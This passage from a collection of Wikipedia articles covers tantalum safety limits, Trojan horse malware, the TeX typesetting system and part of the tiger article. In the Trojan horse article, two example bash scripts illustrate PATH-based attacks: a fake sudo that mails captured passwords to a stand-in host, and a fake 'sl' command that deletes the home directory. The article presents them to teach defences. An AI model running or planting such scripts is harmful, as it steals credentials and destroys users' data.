that, for the moment, do not give consistent results. And in any case, tantalum appears to be present in natural waters mostly as particulate matter rather than dissolved. Values for concentrations in soils, bed sediments and atmospheric aerosols are easier to come by. Values in soils are close to 1 ppm and thus to UCC values. This indicates detrital origin. For atmospheric aerosols the values available are scattered and limited. When tantalum enrichment is observed, it is probably due to loss of more water-soluble elements in aerosols in the clouds. Pollution linked to human use of the element has not been detected. Tantalum appears to be a very conservative element in biogeochemical terms, but its cycling and reactivity are still not fully understood. Precautions Compounds containing tantalum are rarely encountered in the laboratory. The metal is highly biocompatible and is used for body implants and coatings, therefore attention may be focused on other elements or the physical nature of the chemical compound. People can be exposed to tantalum in the workplace by breathing it in, skin contact, or eye contact. The Occupational Safety and Health Administration (OSHA) has set the legal limit (permissible exposure limit) for tantalum exposure in the workplace as 5 mg/m3 over an 8-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 5 mg/m3 over an 8-hour workday and a short-term limit of 10 mg/m3. At levels of 2500 mg/m3, tantalum dust is immediately dangerous to life and health.
Physical sciences
Chemical elements_2
null
30056
https://en.wikipedia.org/wiki/Trojan%20horse%20%28computing%29
Trojan horse (computing)
In computing, a Trojan horse (or simply Trojan) is a malware that misleads users of its true intent by disguising itself as a normal program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering. For example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on the Internet. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected device. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. Use of the term It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both. Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. Behavior Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target device. Some countries like Switzerland and Germany have a legal framework governing the use of such software. Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system. Linux sudo example A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password. #!/usr/bin/env bash # Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in. stty -echo # Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password. prompt_count=1 while [ $prompt_count -le 3 ]; do echo -n "[sudo] password for $(whoami): " read password_input echo sleep 3 # sudo will pause between repeated prompts prompt_count=$(( prompt_count + 1 )) done # Turn the character echo back on. stty echo echo $password_input | mail -s "$(whoami)'s password" outside@creep.com # Display sudo's actual error message and then delete self. echo "sudo: 3 incorrect password attempts" rm $0 exit 1 # sudo returns 1 with a failed password attempt To prevent a sudo Trojan horse, set the . entry in the PATH environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:.. Linux ls example Having . somewhere in the PATH is convenient, but there is a catch. Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl. An attacker would place this script in a publicly writable directory (e.g., /tmp). #!/usr/bin/env bash # Remove the user's home directory, then remove self. rm -fr ~ 2>/dev/null rm $0 To prevent a malicious programmer from anticipating this common typing mistake: omit . in the PATH or alias sl=ls Notable examples Private and governmental ANOM – FBI 0zapftis / r2d2 StaatsTrojaner – DigiTask FinFisher – Lench IT solutions / Gamma International DaVinci / Galileo RCS – HackingTeam Magic Lantern – FBI SUNBURST – SVR/Cozy Bear (suspected) TAO QUANTUM/FOXACID – NSA WARRIOR PRIDE – GCHQ Publicly available EGABTR – late 1980s Netbus – 1998 (published) Sub7 by Mobman – 1999 (published) Back Orifice – 1998 (published) Y3K by Tselentis brothers – 2000 (published) Beast – 2002 (published) Bifrost Trojan – 2004 (published) DarkComet – 2008-2012 (published) Blackhole exploit kit – 2012 (published) Gh0st RAT – 2009 (published) MegaPanzer BundesTrojaner – 2009 (published) MEMZ by Leurak – 2016 (published) Detected by security researchers Twelve Tricks – 1990 Clickbot.A – 2006 (discovered) Zeus – 2007 (discovered) Flashback Trojan – 2011 (discovered) ZeroAccess – 2011 (discovered) Koobface – 2008 (discovered) Vundo – 2009 (discovered) Coreflood – 2010 (discovered) Tiny Banker Trojan – 2012 (discovered) Wirelurker - 2014 (discovered) SOVA – 2022 (discovered) Shedun Android malware – 2015 (discovered) Capitalization The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.
Technology
Computer security
null
30065
https://en.wikipedia.org/wiki/TeX
TeX
TeX (, see below), stylized within the system as , is a typesetting program which was designed and written by computer scientist and Stanford University professor Donald Knuth and first released in 1978. The term now refers to the system of extensions – which includes software programs called TeX engines, sets of TeX macros, and packages which provide extra typesetting functionality – built around the original TeX language. TeX is a popular means of typesetting complex mathematical formulae; it has been noted as one of the most sophisticated digital typographical systems. TeX is widely used in academia, especially in mathematics, computer science, economics, political science, engineering, linguistics, physics, statistics, and quantitative psychology. It has long since displaced Unix troff, the previously favoured formatting system, in most Unix installations. It is also used for many other typesetting tasks, especially in the form of LaTeX, ConTeXt, and other macro packages. TeX was designed with two main goals in mind: to allow anybody to produce high-quality books with minimal effort, and to provide a system that would give exactly the same results on all computers, at any point in time (together with the Metafont language for font description and the Computer Modern family of typefaces). TeX is free software, which made it accessible to a wide range of users. History When the first paper volume of Knuth's The Art of Computer Programming was published in 1968, it was typeset using hot metal typesetting on a Monotype machine. This method, dating back to the 19th century, produced a "classic style" appreciated by Knuth. When the second edition was published, in 1976, the whole book had to be typeset again because the Monotype technology had been largely replaced by phototypesetting, and the original fonts were no longer available. When Knuth received the galley proofs of the new book on 30 March 1977, he found them inferior. Disappointed, Knuth set out to design his own typesetting system. Knuth saw for the first time the output of a high-quality digital typesetting system, and became interested in digital typography. On 13 May 1977, he wrote a memo to himself describing the basic features of TeX. He planned to finish it on his sabbatical in 1978, but as it happened, the language was not "frozen" (ready to use) until 1989, more than ten years later. Guy Steele happened to be at Stanford during the summer of 1978, when Knuth was developing his first version of TeX. When Steele returned to the Massachusetts Institute of Technology that autumn, he rewrote TeX's input/output (I/O) to run under the Incompatible Timesharing System (ITS) operating system. The first version of TeX, called TeX78, was written in the SAIL programming language to run on a PDP-10 under Stanford's WAITS operating system. WEB and literate programming For later versions of TeX, Knuth invented the concept of literate programming, a way of producing compilable source code and cross-linked documentation typeset in TeX from the same original file. The language used is called WEB and produces programs in DEC PDP-10 Pascal. TeX82 TeX82, a new version of TeX rewritten from scratch, was published in 1982. Among other changes, the original hyphenation algorithm was replaced by a new algorithm written by Frank Liang. TeX82 also uses fixed-point arithmetic instead of floating-point, to ensure reproducibility of the results across different computer hardware, and includes a real, Turing-complete programming language, following intense lobbying by Guy Steele. In 1989, Donald Knuth released new versions of TeX and Metafont. Despite his desire to keep the program stable, Knuth realized that 128 different characters for the text input were not enough to accommodate foreign languages; the main change in version 3.0 of TeX is thus the ability to work with 8-bit inputs, allowing 256 different characters in the text input. TeX3.0 was released on March 15, 1990. Since version 3, TeX has used an idiosyncratic version numbering system, where updates have been indicated by adding an extra digit at the end of the decimal, so that the version number asymptotically approaches . This is a reflection of the fact that TeX is now very stable, and only minor updates are anticipated. The current version of TeX is 3.141592653; it was last updated in 2021. The design was frozen after version 3.0, and no new feature or fundamental change will be added, so all newer versions will contain only bug fixes. Even though Donald Knuth himself has suggested a few areas in which TeX could have been improved, he indicated that he firmly believes that having an unchanged system that will produce the same output now and in the future is more important than introducing new features. For this reason, he has stated that the "absolutely final change (to be made after my death)" will be to change the version number to , at which point all remaining bugs will become features. Likewise, versions of Metafont after 2.0 asymptotically approach (currently at 2.7182818), and a similar change will be applied after Knuth's death. Public domain Since the source code of TeX is essentially in the public domain (see below), other programmers are allowed (and explicitly encouraged) to improve the system, but are required to use another name to distribute the modified TeX, meaning that the source code can still evolve. For example, the Omega project was developed after 1991, primarily to enhance TeX's multilingual typesetting abilities. Knuth created "unofficial" modified versions, such as TeX-XeT, which allows a user to mix texts written in left-to-right and right-to-left writing systems in the same document. Use of TeX In several technical fields such as computer science, mathematics, engineering and physics, TeX has become a de facto standard. Many thousands of books have been published using TeX, including books published by Addison-Wesley, Cambridge University Press, Elsevier, Oxford University Press, and Springer. Numerous journals in these fields are produced using TeX or LaTeX, allowing authors to submit their raw manuscript written in TeX. While many publications in other fields, including dictionaries and legal publications, have been produced using TeX, it has not been as successful as in the more technical fields, as TeX was primarily designed to typeset mathematics. When he designed TeX, Donald Knuth did not believe that a single typesetting system would fit everyone's needs; instead, he designed many hooks inside the program so that it would be possible to write extensions, and released the source code, hoping that the publishers would design versions tailoring to their own needs. While such extensions have been created (including some by Knuth himself), most people have extended TeX only using macros and it has remained a system associated with technical typesetting. Typesetting system TeX commands commonly start with a backslash and are grouped with curly braces. Almost all of TeX's syntactic properties can be changed on the fly, which makes TeX input hard to parse by anything but TeX itself. TeX is a macro- and token-based language: many commands, including most user-defined ones, are expanded on the fly until only unexpandable tokens remain, which are then executed. Expansion itself is practically free from side effects. Tail recursion of macros takes no memory, and if-then-else constructs are available. This makes TeX a Turing-complete language even at the expansion level. The system can be divided into four levels: in the first, characters are read from the input file and assigned a category code (sometimes called "catcode", for short). Combinations of a backslash (actually, any character of category zero) followed by letters (characters of category 11) or a single other character are replaced by a control-sequence token. In this sense, this stage is like lexical analysis, although it does not form numbers from digits. In the next stage, expandable control sequences (such as conditionals or defined macros) are replaced by their replacement text. The input for the third stage is then a stream of characters (including the ones with special meaning) and unexpandable control sequences (typically assignments and visual commands). Here, the characters get assembled into a paragraph, and TeX's paragraph breaking algorithm works by optimizing breakpoints over the whole paragraph. The fourth stage breaks the vertical list of lines and other material into pages. The TeX system has precise knowledge of the sizes of all characters and symbols, and using this information, it computes the optimal arrangement of letters per line and lines per page. It then produces a DVI file ("DeVice Independent") containing the final locations of all characters. This DVI file can then be printed directly given an appropriate printer driver, or it can be converted to other formats. Nowadays, pdfTeX is often used, which bypasses DVI generation altogether. The base TeX system understands about 300 commands, called primitives. These low-level commands are rarely used directly by users, and most functionality is provided by format files (predumped memory images of TeX after large macro collections have been loaded). Knuth's original default format, which adds about 600 commands, is Plain TeX. The most widely used format is LaTeX, originally developed by Leslie Lamport, which incorporates document styles for books, letters, slides, etc., and adds support for referencing and automatic numbering of sections and equations. Another widely used format, AMS-TeX, is produced by the American Mathematical Society and provides many more user-friendly commands, which can be altered by journals to fit with their house style. Most of the features of AMS-TeX can be used in LaTeX by using the "AMS packages" (e.g., amsmath, amssymb) and the "AMS document classes" (e.g., amsart, amsbook). This is then referred to as AMS-LaTeX. Other formats include ConTeXt, used primarily for desktop publishing and written mostly by Hans Hagen at Pragma. How it is run A sample Hello world program in plain TeX is: Hello, World \bye % marks the end of the file; not shown in the final output This might be in a file myfile.tex, as .tex is a common file extension for plain TeX files. By default, everything that follows a percent sign on a line is a comment, ignored by TeX. Running TeX on this file (for example, by typing tex myfile.tex in a command-line interpreter, or by calling it from a graphical user interface) will create an output file called myfile.dvi, representing the content of the page in a device independent format (DVI). A DVI file could then be either viewed on screen or converted to a suitable format for any of the various printers for which a device driver existed (printer support was generally not an operating system feature at the time that TeX was created). Knuth has said that there is nothing inherent in TeX that requires DVI as the output format, and later versions of TeX, notably pdfTeX, XeTeX, and LuaTeX, all support output directly to PDF. Mathematical example TeX provides a different text syntax specifically for mathematical formulas. For example, the quadratic formula (which is the solution of the quadratic equation) appears as: The formula is printed in a way a person would write by hand, or typeset the equation. In a document, entering mathematics mode is done by starting with a $ symbol, then entering a formula in TeX syntax, and closing again with another of the same symbol. Knuth explained in jest that he chose the dollar sign to indicate the beginning and end of mathematical mode in plain TeX because typesetting mathematics was traditionally supposed to be expensive. Display mathematics (mathematics presented centred on a new line) is similar but uses $$ instead of a single $ symbol. For example, the above with the quadratic formula in display math: (The examples here are not actually rendered with TeX; spacing, character sizes, and all else may differ.) Aspects The TeX software incorporates several aspects that were not available, or were of lower quality, in other typesetting programs at the time when TeX was released. Some of the innovations are based on interesting algorithms, and have led to several theses for Knuth's students. While some of these discoveries have now been incorporated into other typesetting programs, others, such as the rules for mathematical spacing, are still unique. Mathematical spacing Since the primary goal of the TeX language is high-quality typesetting for publishers of books, Knuth gave a lot of attention to the spacing rules for mathematical formulae. He took three bodies of work that he considered to be standards of excellence for mathematical typography: the books typeset by the Addison-Wesley Publishing house (the publisher of The Art of Computer Programming) under the supervision of Hans Wolf; editions of the mathematical journal Acta Mathematica dating from around 1910; and a copy of Indagationes Mathematicae, a Dutch mathematics journal. Knuth looked closely at these printed papers to sort out and look for a set of rules for spacing. While TeX provides some basic rules and the tools needed to specify proper spacing, the exact parameters depend on the font used to typeset the formula. For example, the spacing for Knuth's Computer Modern fonts has been precisely fine-tuned over the years and is now set; but when other fonts, such as AMS Euler, were used by Knuth for the first time, new spacing parameters had to be defined. The typesetting of math in TeX is not without criticism, particularly with respect to technical details of the font metrics, which were designed in an era when significant attention was paid to storage requirements. This resulted in some "hacks" overloading some fields, which in turn required other "hacks". On an aesthetics level, the rendering of radicals has also been criticized. The OpenType math font specification largely borrows from TeX, but has some new features/enhancements. Hyphenation and justification In comparison with manual typesetting, the problem of justification is easy to solve with a digital system such as TeX, which, provided that good points for line breaking have been defined, can automatically spread the spaces between words to fill in the line. The problem is thus to find the set of breakpoints that will give the most visually pleasing result. Many line-breaking algorithms use a first-fit approach, where the breakpoints for each line are determined one after the other, and no breakpoint is changed after it has been chosen. Such a system is not able to define a breakpoint depending on the effect that it will have on the following lines. In comparison, the total-fit line-breaking algorithm used by TeX and developed by Donald Knuth and Michael Plass considers all the possible breakpoints in a paragraph, and finds the combination of line breaks that will produce the most globally pleasing arrangement. Formally, the algorithm defines a value called badness associated with each possible line break; the badness is increased if the spaces on the line must stretch or shrink too much to make the line the correct width. Penalties are added if a breakpoint is particularly undesirable: for example, if a word must be hyphenated, if two lines in a row are hyphenated, or if a very loose line is immediately followed by a very tight line. The algorithm will then find the breakpoints that will minimize the sum of squares of the badness (including penalties) of the resulting lines. If the paragraph contains possible breakpoints, the number of situations that must be evaluated naively is . However, by using the method of dynamic programming, the complexity of the algorithm can be brought down to (see Big O notation). Further simplifications (for example, not testing extremely unlikely breakpoints such as a hyphenation in the first word of a paragraph, or very overfull lines) lead to an efficient algorithm whose running time is , where is the width of a line. A similar algorithm is used to determine the best way to break paragraphs across two pages, in order to avoid widows or orphans (lines that appear alone on a page while the rest of the paragraph is on the following or preceding page). However, in general, a thesis by Michael Plass shows how the page-breaking problem can be NP-complete because of the added complication of placing figures. TeX's line-breaking algorithm has been adopted by several other programs, such as Adobe InDesign (a desktop publishing application) and the GNU fmt Unix command line utility. If no suitable line break can be found for a line, the system will try to hyphenate a word. The original version of TeX used a hyphenation algorithm based on a set of rules for the removal of prefixes and suffixes of words, and for deciding if it should insert a break between the two consonants in a pattern of the form vowel–consonant–consonant–vowel (which is possible most of the time). TeX82 introduced a new hyphenation algorithm, designed by Frank Liang in 1983, to assign priorities to breakpoints in letter groups. A list of hyphenation patterns is first generated automatically from a corpus of hyphenated words (a list of 50,000 words). If TeX must find the acceptable hyphenation positions in the word encyclopedia, for example, it will consider all the subwords of the extended word .encyclopedia., where . is a special marker to indicate the beginning or end of the word. The list of subwords includes all the subwords of length 1 (., e, n, c, y, etc.), of length 2 (.e, en, nc, etc.), etc., up to the subword of length 14, which is the word itself, including the markers. TeX will then look into its list of hyphenation patterns, and find subwords for which it has calculated the desirability of hyphenation at each position. In the case of our word, 11 such patterns can be matched, namely 1c4l4, 1cy, 1d4i3a, 4edi, e3dia, 2i1a, ope5d, 2p2ed, 3pedi, pedia4, y1c. For each position in the word, TeX will calculate the maximum value obtained among all matching patterns, yielding en1cy1c4l4o3p4e5d4i3a4. Finally, the acceptable positions are those indicated by an odd number, yielding the acceptable hyphenations en-cy-clo-pe-di-a. This system based on subwords allows the definition of very general patterns (such as 2i1a), with low indicative numbers (either odd or even), which can then be superseded by more specific patterns (such as 1d4i3a) if necessary. These patterns find about 90% of the hyphens in the original dictionary; more importantly, they do not insert any spurious hyphen. In addition, a list of exceptions (words for which the patterns do not predict the correct hyphenation) are included with the Plain TeX format; additional ones can be specified by the user. Metafont Metafont, not strictly part of TeX, is a font description system which allows the designer to describe characters algorithmically. It uses Bézier curves in a fairly standard way to generate the actual characters to be displayed, but Knuth devotes substantial attention to the rasterizing problem on bitmapped displays. Another thesis, by John Hobby, further explores this problem of digitizing "brush trajectories". This term derives from the fact that Metafont describes characters as having been drawn by abstract brushes (and erasers). It is commonly believed that TeX is based on bitmap fonts but, in fact, these programs "know" nothing about the fonts that they are using other than their dimensions. It is the responsibility of the device driver to appropriately handle fonts of other types, including PostScript Type 1 and TrueType. Computer Modern (commonly known as "the TeX font") is freely available in Type 1 format, as are the AMS math fonts. Users of TeX systems that output directly to PDF, such as pdfTeX, XeTeX, or LuaTeX, generally never use Metafont output at all. Macro language TeX documents are written and programmed using an unusual macro language. Broadly speaking, the running of this macro language involves expansion and execution stages which do not interact directly. Expansion includes both literal expansion of macro definitions as well as conditional branching, and execution involves such tasks as setting variables/registers and the actual typesetting process of adding glyphs to boxes. The definition of a macro not only includes a list of commands but also the syntax of the call. It differs with most widely used lexical preprocessors like M4, in that the body of a macro gets tokenized at definition time. The TeX macro language has been used to write larger document production systems, most notably including LaTeX and ConTeXt. Development The original source code for the current TeX software is written in WEB, a mixture of documentation written in TeX and a Pascal subset in order to ensure readability and portability. For example, TeX does all of its dynamic allocation itself from fixed-size arrays and uses only fixed-point arithmetic for its internal calculations. As a result, TeX has been ported to almost all operating systems, usually by using the web2c program to convert the source code into C instead of directly compiling the Pascal code. Knuth has kept a very detailed log of all the bugs he has corrected and changes he has made in the program since 1982; , the list contains 440 entries, not including the version modification that should be done after his death as the final change in TeX. Knuth offers monetary awards to people who find and report a bug in TeX. The award per bug started at US$2.56 (one "hexadecimal dollar") and doubled every year until it was frozen at its current value of $327.68. Knuth has lost relatively little money as there have been very few bugs claimed. In addition, recipients have been known to frame their check as proof that they found a bug in TeX rather than cashing it. Due to scammers finding scanned copies of his checks on the internet and using them to try to drain his bank account, Knuth no longer sends out real checks, but those who submit bug reports can get credit at The Bank of San Serriffe instead. Distributions and extensions TeX is usually provided in the form of an easy-to-install bundle of TeX itself along with Metafont and all the necessary fonts, documents formats, and utilities needed to use the typesetting system. On UNIX-compatible systems, including Linux and Apple macOS, TeX is distributed as part of the larger TeX Live distribution. (Prior to TeX Live, the teTeX distribution was the de facto standard on UNIX-compatible systems.) On Microsoft Windows, there is the MiKTeX distribution (enhanced by proTeXt) and the Microsoft Windows version of TeX Live. Several document processing systems are based on TeX, notably jadeTeX, which uses TeX as a backend for printing from James Clark's DSSSL Engine, the Arbortext publishing system, and Texinfo, the GNU documentation processing system. TeX has been the official typesetting package for the GNU operating system since 1984. Numerous extensions and companion programs for TeX exist, among them BibTeX for bibliographies (distributed with LaTeX); pdfTeX, a TeX-compatible engine which can directly produce PDF output (as well as continuing to support the original DVI output); XeTeX, a TeX-compatible engine that supports Unicode and OpenType; and LuaTeX, a Unicode-aware extension to TeX that includes a Lua runtime with extensive hooks into the underlying TeX routines and algorithms. Most TeX extensions are available for free from CTAN, the Comprehensive TeX Archive Network. Editors There are a variety of editors designed to work with TeX: The TeXmacs text editor is a WYSIWYG-WYSIWYM scientific text editor, inspired by both TeX and Emacs. It uses Knuth's fonts and can generate TeX output. Overleaf is a partial-WYSIWYG, online editor that provides a cloud-based solution to TeX along with additional features in real-time collaborative editing. LyX is a WYSIWYM document processor which runs on a variety of platforms including: Linux, Microsoft Windows (newer versions require Windows 2000 or later) Apple macOS (using a non-native Qt front-end). TeXShop (for macOS), TeXworks (for Linux, macOS and Windows) and WinShell (for Windows) are similar tools and provide an integrated development environment (IDE) for working with LaTeX or TeX. For KDE/Qt, Kile provides such an IDE. Texmaker is the Pure Qt equivalent of Kile, with a user interface that is nearly the same as Kile's. TeXstudio is an open-source fork (2009) of Texmaker that offers a different approach to configurability and features. Free downloadable binaries are provided for Windows, Linux, macOS, OS/2, and FreeBSD. GNU Emacs has various built-in and third-party packages with support for TeX, the major one being AUCTeX. Visual Studio Code. A notable extension is LaTeX Workshop For Vim, possible plugins include Vim-LaTeX Suite, Automatic TeX, and TeX-9. For Apache OpenOffice and LibreOffice, iMath and TexMaths extensions can provide mathematical TeX typesetting. For MediaWiki, the Math extension provides mathematical TeX typesetting, but the code needs to be surrounded by <math> tag. Licence Donald Knuth has indicated several times that the source code of TeX has been placed into the "public domain", and he strongly encourages modifications or experimentations with this source code. However, since Knuth highly values the reproducibility of the output of all versions of TeX, any changed version must not be called TeX, or anything confusingly similar. To enforce this rule, any implementation of the system must pass a test suite called the TRIP test before being allowed to be called TeX. The question of licence is somewhat confused by the statements included at the beginning of the TeX source code, which indicate that "all rights are reserved. Copying of this file is authorized only if ... you make absolutely no changes to your copy". This restriction should be interpreted as a prohibition to change the source code as long as the file is called tex.web. The copyright note at the beginning of tex.web (and mf.web) was changed in 2021 to explicitly state this. This interpretation is confirmed later in the source code when the TRIP test is mentioned ("If this program is changed, the resulting system should not be called 'TeX). The American Mathematical Society tried in the early 1980s to claim a trademark for TeX. This was rejected because at the time "TEX" (all caps) was registered by Honeywell for the "Text EXecutive" text processing system. XML publication It is possible to use TeX for automatic generation of sophisticated layout for XML data. The differences in syntax between the two description languages can be overcome with the help of TeXML. In the context of XML publication, TeX can thus be considered an alternative to XSL-FO. TeX allowed scientific papers in mathematical disciplines to be reduced to relatively small files that could be rendered client-side, allowing fully typeset scientific papers to be exchanged over the early Internet and emerging World Wide Web, even when sending large files was difficult. This paved the way for the creation of repositories of scientific papers such as arXiv, through which papers could be 'published' without an intermediary publisher. Pronunciation and spelling The name TeX is intended by its developer to be pronounced , with the final consonant of loch. The letters of the name are meant to represent the capital Greek letters tau, epsilon, and chi, as TeX is an abbreviation of τέχνη ( ), Greek for both "art" and "craft", which is also the root word of technical. English speakers often pronounce it , like the first syllable of technical. Knuth instructs that it be typeset with the "E" below the baseline and reduced spacing between the letters. This is done, as Knuth mentions in his TeXbook, to distinguish TeX from other system names such as TEX, the Text EXecutive processor (developed by Honeywell Information Systems). Fans like to proliferate names from the word "TeX"—such as TeXnician (user of TeX software), TeXhacker (TeX programmer), TeXmaster (competent TeX programmer), TeXhax, and TeXnique. Community Notable entities in the TeX community include the TeX Users Group (TUG), which currently publishes TUGboat and formerly published The PracTeX Journal, covering a wide range of topics in digital typography relevant to TeX. The Deutschsprachige Anwendervereinigung TeX (DANTE) is a large user group in Germany. The TeX Users Group was founded in 1980 for educational and scientific purposes, provides an organization for those who have an interest in typography and font design, and are users of the TeX typesetting system invented by Knuth. The TeX Users Group represents the interests of TeX users worldwide. The TeX Users Group publishes the journal TUGboat three times per year; DANTE publishes four times per year. Other user groups include DK-TUG in Denmark, in France, GuIT in Italy, NTG in the Netherlands and UK-TUG in the United Kingdom; the user groups jointly maintain a complete list. Extensions List of TeX extensions
Technology
Office and data management
null
30075
https://en.wikipedia.org/wiki/Tiger
Tiger
The tiger (Panthera tigris) is a large cat and a member of the genus Panthera native to Asia. It has a powerful, muscular body with a large head and paws, a long tail and orange fur with black, mostly vertical stripes. It is traditionally classified into nine recent subspecies, though some recognise only two subspecies, mainland Asian tigers and the island tigers of the Sunda Islands. Throughout the tiger's range, it inhabits mainly forests, from coniferous and temperate broadleaf and mixed forests in the Russian Far East and Northeast China to tropical and subtropical moist broadleaf forests on the Indian subcontinent and Southeast Asia. The tiger is an apex predator and preys mainly on ungulates, which it takes by ambush. It lives a mostly solitary life and occupies home ranges, defending these from individuals of the same sex. The range of a male tiger overlaps with that of multiple females with whom he mates. Females give birth to usually two or three cubs that stay with their mother for about two years. When becoming independent, they leave their mother's home range and establish their own. Since the early 20th century, tiger populations have lost at least 93% of their historic range and are locally extinct in West and Central Asia, in large areas of China and on the islands of Java and Bali. Today, the tiger's range is severely fragmented. It is listed as Endangered on the IUCN Red List of Threatened Species, as its range is thought to have declined by 53% to 68% since the late 1990s. Major threats to tigers are habitat destruction and fragmentation due to deforestation, poaching for fur and the illegal trade of body parts for medicinal purposes. Tigers are also victims of human–wildlife conflict as they attack and prey on livestock in areas where natural prey is scarce. The tiger is legally protected in all range countries. National conservation measures consist of action plans, anti-poaching patrols and schemes for monitoring tiger populations. In several range countries, wildlife corridors have been established and tiger reintroduction is planned. The tiger is among the most popular of the world's charismatic megafauna. It has been kept in captivity since ancient times and has been trained to perform in circuses and other entertainment shows. The tiger featured prominently in the ancient mythology and folklore of cultures throughout its historic range and has continued to appear in culture worldwide. Etymology The Old English tigras derives from Old French , from Latin , which was a borrowing from (). Since ancient times, the word has been suggested to originate from the Armenian or Persian word for 'arrow', which may also be the origin of the name for the river Tigris. However, today, the names are thought to be homonyms, and the connection between the tiger and the river is doubted. Taxonomy In 1758, Carl Linnaeus described the tiger in his work Systema Naturae and gave it the scientific name Felis tigris, as the genus Felis was being used for all cats at the time. His scientific description was based on descriptions by earlier naturalists such as Conrad Gessner and Ulisse Aldrovandi. In 1929, Reginald Innes Pocock placed the species in the genus Panthera using the scientific name Panthera tigris. Subspecies Nine recent tiger subspecies have been proposed between the early 19th and early 21st centuries, namely the Bengal, Malayan, Indochinese, South China, Siberian, Caspian, Javan, Bali and Sumatran tigers. The validity of several tiger subspecies was questioned in 1999 as most putative subspecies were distinguished on the basis of fur length and colouration, striping patterns and body size of specimens in natural history museum collections that are not necessarily representative for the entire population. It was proposed to recognise only two tiger subspecies as valid, namely P. t. tigris in mainland Asia and the smaller P. t. sondaica in the Greater Sunda Islands. This two-subspecies proposal was reaffirmed in 2015 through a comprehensive analysis of morphological, ecological and mitochondrial DNA (mtDNA) traits of all putative tiger subspecies. In 2017, the Cat Classification Task Force of the IUCN Cat Specialist Group revised felid taxonomy in accordance with the 2015 two-subspecies proposal and recognised only P. t. tigris and P. t. sondaica. Results of a 2018 whole-genome sequencing study of 32 samples from the six living putative subspecies—the Bengal, Malayan, Indochinese, South China, Siberian and Sumatran tiger—found them to be distinct and separate clades. These results were corroborated in 2021 and 2023. The Cat Specialist Group states that "Given the varied interpretations of data, the [subspecific] taxonomy of this species is currently under review by the IUCN SSC Cat Specialist Group." The following tables are based on the classification of the tiger as of 2005, and also reflect the classification recognised by the Cat Classification Task Force in 2017. Evolution The tiger shares the genus Panthera with the lion, leopard, jaguar and snow leopard. Results of genetic analyses indicate that the tiger and snow leopard are sister species whose lineages split from each other between 2.70 and 3.70 million years ago. The tiger's whole genome sequencing shows repeated sequences that parallel those in other cat genomes. The fossil species Panthera palaeosinensis of early Pleistocene northern China was described as a possible tiger ancestor when it was discovered in 1924, but modern cladistics places it as basal to modern Panthera. Panthera zdanskyi lived around the same time and place, and was suggested to be a sister species of the modern tiger when it was examined in 2014. However, as of 2023, at least two subsequent studies considered P. zdanskyi likely to be a synonym of P. palaeosinensis, noting that its proposed differences from that species fell within the range of individual variation. The earliest appearance of the modern tiger species in the fossil record are jaw fragments from Lantion in China that are dated to the early Pleistocene. Middle- to late-Pleistocene tiger fossils have been found throughout China, Sumatra and Java. Prehistoric subspecies include Panthera tigris trinilensis and P. t. soloensis of Java and Sumatra and P. t. acutidens of China; late Pleistocene and early Holocene fossils of tigers have also been found in Borneo and Palawan, Philippines. Fossil specimens of tigers have also been reported from the Middle-Late Pleistocene of Japan. Results of a phylogeographic study indicate that all living tigers have a common ancestor that lived between 108,000 and 72,000 years ago. Genetic studies suggest that the tiger population contracted around 115,000 years ago due to glaciation. Modern tiger populations originated from a refugium in Indochina and spread across Asia after the Last Glacial Maximum. As they colonised northeastern China, the ancestors of the South China tiger intermixed with a relict tiger population. Hybrids Tigers can interbreed with other Panthera cats and have done so in captivity. The liger is the offspring of a female tiger and a male lion and the tigon the offspring of a male tiger and a female lion. The lion sire passes on a growth-promoting gene, but the corresponding growth-inhibiting gene from the female tiger is absent, so that ligers grow far larger than either parent species. By contrast, the male tiger does not pass on a growth-promoting gene while the lioness passes on a growth inhibiting gene; hence, tigons are around the same size as their parents. Since they often develop life-threatening birth defects and can easily become obese, breeding these hybrids is regarded as unethical. Characteristics The tiger has a typical felid morphology, with a muscular body, shortened legs, strong forelimbs with wide 